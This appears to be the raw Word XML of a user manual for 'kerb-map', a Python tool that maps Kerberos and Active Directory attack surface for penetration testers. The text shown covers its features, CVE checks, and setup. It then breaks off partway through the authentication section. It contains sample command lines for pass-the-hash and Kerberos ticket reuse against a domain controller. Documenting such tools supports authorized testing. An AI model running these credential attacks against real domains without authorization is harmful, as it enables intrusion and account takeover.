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160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="8B1A1A"/>
          <w:sz w:val="80"/>
          <w:szCs w:val="80"/>
        </w:rPr>
        <w:t xml:space="preserve">KERB-MAP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Kerberos Attack Surface Mapper</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">User Manual &amp; Technical Reference</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Version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D2D2D" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="200"/>
              <w:left w:type="dxa" w:w="400"/>
              <w:bottom w:type="dxa" w:w="200"/>
              <w:right w:type="dxa" w:w="400"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">AD Enumeration  ·  Kerberoast Scoring  ·  Delegation Mapping</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE Detection  ·  Priority Ranking  ·  BloodHound Export  ·  Encryption Audit  ·  Trust Mapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8B1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">For use in authorized penetration testing and red team engagements only.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore/>
        <w:spacing w:after="300" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>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120"/>
      </w:pPr>
      <w:bookmarkStart w:name="1__Introduction" w:id="10"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">kerb-map is an Active Directory enumeration and attack surface mapping tool written in Python. It is designed for use by penetration testers and red team operators during authorized engagements against Windows domain environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Unlike running a collection of impacket scripts manually, kerb-map consolidates every Kerberos-related attack surface into a single authenticated scan and produces a ranked, prioritised hit list telling you exactly where to start and what command to run next.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="1_1_What_kerb_map_Does" w:id="11"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1 What kerb-map Does</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">In a single authenticated LDAP session, kerb-map:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Discovers every Kerberoastable account (SPN holders) and scores each by crackability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Finds every AS-REP Roastable account (pre-authentication disabled)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Maps all three Kerberos delegation types: Unconstrained, Constrained, and RBCD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumerates privileged users, stale accounts, password policy risks, DnsAdmins, domain trusts, and LAPS status</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Audits Kerberos encryption types across all accounts and DCs, flagging RC4-only and DES configurations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Maps all domain and forest trust relationships with risk scoring for SID filtering gaps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Detects known CVEs and misconfigurations: ZeroLogon, noPac, PrintNightmare, PetitPotam, AD CS ESC1–ESC8, MS14-068, GPP Passwords, Bronze Bit, Certifried, and LDAP signing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-correlates all findings into a unified, priority-ranked attack path list</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Exports results as JSON or BloodHound-compatible format</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Stores every scan in a local SQLite cache for historical comparison</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="1_2_Philosophy" w:id="12"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2 Philosophy</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">kerb-map is built around three principles:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Safe by default — all LDAP queries are read-only. RPC-based CVE probes that generate Windows events are gated behind an explicit --aggressive flag.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tell me what to do next — every finding includes the exact next command to run, so there is no gap between enumeration and exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Don’t rebuild what exists — the tool orchestrates impacket, ldap3, and existing protocol libraries rather than reimplementing them. It adds scoring, correlation, and workflow on top.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="1_3_Prerequisites" w:id="13"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3 Prerequisites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Requirement</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Python 3.10+</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Tested on 3.10, 3.11, 3.12</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ldap3</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connection and queries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impacket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Kerberos, RPC, NTLM protocol support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rich</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Terminal output and tables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Network access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TCP 389 (LDAP) to DC. TCP 135 + named pipes for --aggressive RPC checks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Domain account</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Any valid domain user. Higher-privileged accounts may reveal more data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Install all dependencies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pip install -r requirements.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="200" w:before="120"/>
      </w:pPr>
      <w:bookmarkStart w:name="2__Quick_Start" w:id="14"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Quick Start</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="2_1_Basic_Scan___Password_Authentication" w:id="15"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 Basic Scan — Password Authentication</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The minimum required arguments are the target domain, DC IP, username, and one authentication method. This runs all modules except the aggressive RPC-based CVE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jsmith -p Password123</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="2_2_Pass_the_Hash" w:id="16"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 Pass-the-Hash</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Supply an NTLM hash instead of a plaintext password. Accepts either the full LM:NT format or the NT hash alone (the LM half is automatically padded):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Full LM:NT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">python kerb-map.py -d corp.local -dc 192.168.1.10 -u jsmith \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  -H aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0</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NT hash only (LM auto-padded)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">python kerb-map.py -d corp.local -dc 192.168.1.10 -u jsmith \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  -H 31d6cfe0d16ae931b73c59d7e0c089c0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="2_3_Kerberos_Ticket__ccache_" w:id="17"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.3 Kerberos Ticket (ccache)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Use a previously obtained Kerberos TGT. Point KRB5CCNAME at your ccache file before running. This is the natural workflow after performing a Pass-the-Ticket attack using getST.py or ticketer.py from impacket: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export KRB5CCNAME=/tmp/jsmith.ccache</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">python kerb-map.py -d corp.local -dc 192.168.1.10 -u jsmith -k</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="2_4_Full_Scan_With_CVEs_and_JSON_Export" w:id="18"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4 Full Scan With CVEs and JSON Export</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jsmith -p Password123 \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  --all --cves --aggressive -o json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CC0000" w:sz="12"/>
              <w:bottom w:val="single" w:color="DDDDDD" w:sz="1"/>
              <w:right w:val="single" w:color="DDDDDD" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFF5F5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="CC0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">WARNING</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">The --aggressive flag enables RPC-based CVE probes that generate Windows Event IDs 5145 (named pipe access) and Netlogon events on the DC. Only use this flag when your scope explicitly allows noisy testing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="200" w:before="120"/>
      </w:pPr>
      <w:bookmarkStart w:name="3__Authentication" w:id="19"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Authentication</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">kerb-map supports three authentication methods, all of which are handled transparently through a single LDAP connection object. Once the connection is established, every module reuses it without re-authenticating.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="3_1_Plaintext_Password___p_" w:id="20"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 Plaintext Password (-p)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Authenticates via NTLM with a plaintext password. The credentials are never written to disk by kerb-map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jsmith -p Summer2024!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="3_2_Pass_the_Hash___H_" w:id="21"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 Pass-the-Hash (-H)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Uses the NTLM hash directly, bypassing the need for a plaintext password. This is the standard method when you have obtained hashes from a secretsdump or LSASS dump. The tool accepts either NT-only (32 hex chars) or the full LM:NT format. If only NT is provided, the LM half is automatically padded with the empty LM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jsmith \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
